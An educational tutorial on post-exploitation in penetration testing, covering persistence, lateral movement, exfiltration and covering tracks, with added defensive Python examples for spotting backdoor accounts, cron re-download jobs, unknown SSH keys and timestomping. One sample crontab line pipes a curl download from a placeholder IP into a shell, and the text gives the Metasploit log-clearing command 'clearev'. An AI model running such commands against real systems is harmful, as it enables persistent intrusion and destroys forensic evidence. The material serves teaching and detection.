Ethical Hacking Post-Exploitation and Persistence

After gaining elevated access to a system, an ethical hacker enters the post-exploitation phase. This phase demonstrates what a real attacker would do with control of the compromised system — what data they could steal, how they would maintain long-term access, and how far they could spread through the network. Documenting post-exploitation actions gives the client a clear picture of the full impact of the vulnerability that was exploited.

What Happens After Initial Compromise

A real attacker who gains access to a system does not stop there. They pursue four objectives:

  1. Maintain access — Ensure they can return even if the initial vulnerability is patched.
  2. Expand access — Move laterally to other systems on the network.
  3. Gather intelligence — Find valuable data: credentials, sensitive documents, configuration files.
  4. Cover tracks — Remove evidence of their presence to avoid detection.

An ethical hacker simulates all four objectives and documents every action meticulously.

Persistence Mechanisms on Windows

Persistence ensures the attacker retains access even after a reboot or a session timeout. Windows provides many legitimate system features that attackers abuse for persistence.

Registry Run Keys

Windows checks specific registry keys on startup and runs any executables listed there. Adding a malicious executable to these keys causes it to run automatically every time the corresponding user logs in:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

This is a common persistence mechanism because it requires only standard user privileges to modify the HKCU hive.

Scheduled Tasks

Windows Task Scheduler runs programs at defined times or triggered by events. An attacker creates a scheduled task that runs their backdoor every hour, at every login, or whenever the network becomes available. Scheduled tasks with SYSTEM privileges are particularly powerful.

Startup Folder

Any shortcut or executable placed in the Windows Startup folder runs when the user logs in. The per-user startup folder requires only standard user rights. The all-users startup folder requires administrator access.

Windows Services

Windows services run in the background continuously, even without a user logged in. An attacker with administrator access creates a new service that runs their backdoor as SYSTEM. Services are harder to spot than startup folder entries and survive reboots reliably.

DLL Side-Loading

By placing a malicious DLL alongside a legitimate application that Windows automatically loads on startup, the attacker ensures their code runs every time the application launches — no new registry entries or scheduled tasks needed.

Persistence Mechanisms on Linux

Cron Jobs

Adding a cron job that downloads and executes a payload from an attacker-controlled server at regular intervals creates persistent access. Even if the malware is detected and removed, the cron job re-downloads and reinstalls it at the next scheduled interval.

SSH Authorized Keys

Linux uses SSH key pairs for passwordless authentication. An attacker adds their public key to ~/.ssh/authorized_keys on the compromised system. They can then SSH back into the system at any time using their matching private key, with no password required — and without needing the original vulnerability to remain unpatched.

Backdoor User Account

With root access, an attacker creates a hidden user account — often named something inconspicuous like "backup" or "monitor" — with a password they control. The account provides persistent access through normal login channels.
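A defender-side audit of the three Linux persistence mechanisms above (backdoor UID-0 accounts, download-and-execute cron jobs, and unrecognised SSH keys), written as an added example rather than code from the page. The /etc/passwd, crontab and authorized_keys contents, the IP address and the key inventory are all constructed sample data.

```python
"""Audit constructed /etc/passwd, crontab and authorized_keys text for the
Linux persistence mechanisms described above (added example, not from the page)."""
import re

# Constructed sample /etc/passwd: "backup" is a second UID-0 (root) account.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:0:0:backup:/var/backups:/bin/bash
"""

# Constructed crontab: one legitimate job and one job that fetches and runs a payload.
CRONTAB = """\
0 2 * * * /usr/local/bin/rotate-logs.sh
*/10 * * * * curl -s http://203.0.113.10/p.sh | sh
"""

# Constructed authorized_keys: the second key blob is not in the approved inventory.
AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyBlob alice@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUnknownKeyBlob monitor
"""
KEY_INVENTORY = {"AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyBlob"}

# "curl/wget ... | sh" or "sh -c '... http://...'" style re-download loops.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bsh\s+-c\s+.*https?://")


def extra_uid0_accounts(passwd):
    """Return account names other than root whose UID field is 0."""
    found = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def download_exec_cron_lines(crontab):
    """Return cron lines that fetch something over HTTP and pipe it into a shell."""
    return [line for line in crontab.splitlines() if DOWNLOAD_EXEC.search(line)]


def unknown_authorized_keys(authorized_keys, inventory):
    """Return (key type, comment) for every key whose blob is not in the inventory."""
    unknown = []
    for line in authorized_keys.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1] not in inventory:
            unknown.append((parts[0], parts[2] if len(parts) > 2 else ""))
    return unknown
```

Comparing key blobs against an inventory matters more than reading the comment field, because an attacker chooses the comment and can name the key "monitor" or "backup" to look routine.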

Rootkits

A rootkit modifies the operating system itself to hide the attacker's presence. It intercepts system calls and removes the attacker's files, processes, and network connections from the output of tools like ls, ps, and netstat. A system with a rootkit installed appears clean even while under active compromise.

Lateral Movement: Spreading Through the Network

Lateral movement uses the access and credentials gathered on one machine to compromise additional systems on the same network. A single compromised workstation becomes a stepping stone to servers, databases, and domain controllers.

Pass-the-Hash

Credentials harvested from a compromised Windows machine — in the form of NTLM hashes — authenticate to other Windows machines on the network without cracking the underlying password. The attacker moves from machine to machine using the same stolen hash.

Pass-the-Ticket (Kerberos)

In Active Directory environments, authentication uses Kerberos tickets. A compromised machine may hold valid Kerberos tickets in memory. An attacker extracts these tickets and uses them to authenticate to services that the original user had access to — even after the user has logged out.

Remote Service Exploitation

With credentials from one machine, the attacker logs into other machines via RDP (Remote Desktop), SSH, SMB, WinRM, or other remote management protocols. Any machine that shares the same credentials as the compromised machine becomes accessible.

Living off the Land (LotL)

Living off the Land describes using legitimate tools already installed on a system — PowerShell, WMI, PsExec, WMIC — for malicious purposes. Because these are trusted, built-in tools, security software does not flag them. An attacker who uses PowerShell to move laterally looks like an administrator running scripts.

Data Exfiltration

Demonstrating that sensitive data could be exfiltrated is one of the most impactful parts of a penetration test report. Common exfiltration targets include:

  • Credential stores and password managers
  • Database contents — customer records, financial data, intellectual property
  • Configuration files containing API keys, database passwords, and cloud credentials
  • Source code repositories
  • Executive emails and documents

Exfiltration methods include HTTPS (blends with normal traffic), DNS tunneling (encodes data in DNS queries to bypass data-loss-prevention tools), and cloud storage uploads (using legitimate cloud services like Google Drive or Dropbox, which many organizations do not block).

Covering Tracks

A thorough ethical hacker documents what a real attacker would do to hide their presence. Covering tracks includes:

Clearing Logs

Operating systems keep event logs recording logins, program executions, and system changes. An attacker clears relevant log entries to erase evidence of their activity. On Windows, this includes the Security, Application, and System event logs. On Linux, files like /var/log/auth.log, /var/log/syslog, and the bash history file record attacker actions.

In Metasploit, clearing Windows event logs is a single command:

clearev

Timestomping

Every file has three timestamps: Created, Modified, and Accessed. Forensic investigators use these to establish a timeline of attacker activity. Timestomping changes these timestamps to match existing system files, making malicious files blend into normal system content.
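One forensic check that catches the timestomping described above, added here as an example and not taken from the page. It assumes Linux semantics, where utime() can rewrite the Modified and Accessed times but only the kernel sets the inode change time (ctime); the 60-second tolerance is an arbitrary threshold chosen for the example.

```python
"""Flag files whose Modified time is far older than their inode change time.
On Linux a normal edit advances both together, so a large ctime - mtime gap
means the mtime was rewritten after the last real change (added example)."""
import os
import tempfile
import time


def timestomp_suspects(directory, tolerance_seconds=60):
    """Return [(path, ctime - mtime)] for regular files under directory whose
    mtime predates ctime by more than tolerance_seconds."""
    suspects = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            st = os.stat(path)
            gap = st.st_ctime - st.st_mtime   # st_ctime is inode change time on Linux
            if gap > tolerance_seconds:
                suspects.append((path, gap))
    return suspects


def demo():
    """Create two files in a temporary directory, backdate the mtime of one
    (the artefact a timestomping tool leaves) and return which ones get flagged."""
    with tempfile.TemporaryDirectory() as d:
        clean = os.path.join(d, "clean.txt")
        stomped = os.path.join(d, "stomped.txt")
        for path in (clean, stomped):
            with open(path, "w") as f:
                f.write("sample")
        # Rewrite atime/mtime to a year ago; ctime stays at "now" because the
        # kernel updates it on the utime() call itself.
        year_ago = time.time() - 365 * 86400
        os.utime(stomped, (year_ago, year_ago))
        return [os.path.basename(p) for p, _gap in timestomp_suspects(d)]
```

Files restored from archives or copied with `cp -p` also show an old mtime next to a fresh ctime, so treat hits as leads to correlate with the install history rather than as proof of tampering.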

Disabling Logging

More aggressive attackers disable security monitoring tools — stopping antivirus services, disabling Windows Defender, or removing endpoint detection and response (EDR) agents. An ethical hacker tests whether these tools can be disabled and documents the finding.

Post-Exploitation Diagram: The Attacker's Footprint

Think of a burglar who breaks into an office and does not leave immediately:

  • They copy a key to come back whenever they want (persistence).
  • They find the master key that opens every other office in the building (lateral movement).
  • They photograph all the documents in the filing cabinets (data exfiltration).
  • They delete the security camera footage of their visit (covering tracks).

An ethical hacker demonstrates each of these steps, proves they were possible, and reports what the organization must do to detect and prevent each one.

Important Note on Ethical Practice

During a real penetration test, every post-exploitation action is performed with explicit written authorization. The ethical hacker documents each step in real time. Before the engagement ends, all backdoors, persistence mechanisms, and test accounts created during the test are removed. The target system is restored to its pre-test state.

Key Points

  • Post-exploitation pursues four goals: maintain access, expand access, gather intelligence, and cover tracks.
  • Windows persistence mechanisms include registry run keys, scheduled tasks, startup folders, and installed services.
  • Linux persistence mechanisms include cron jobs, SSH authorized keys, backdoor accounts, and rootkits.
  • Lateral movement uses pass-the-hash, pass-the-ticket, remote services, and living-off-the-land techniques to spread through the network.
  • Covering tracks involves clearing logs, timestomping files, and disabling security monitoring.
  • All persistence mechanisms created during a test must be removed before the engagement closes.
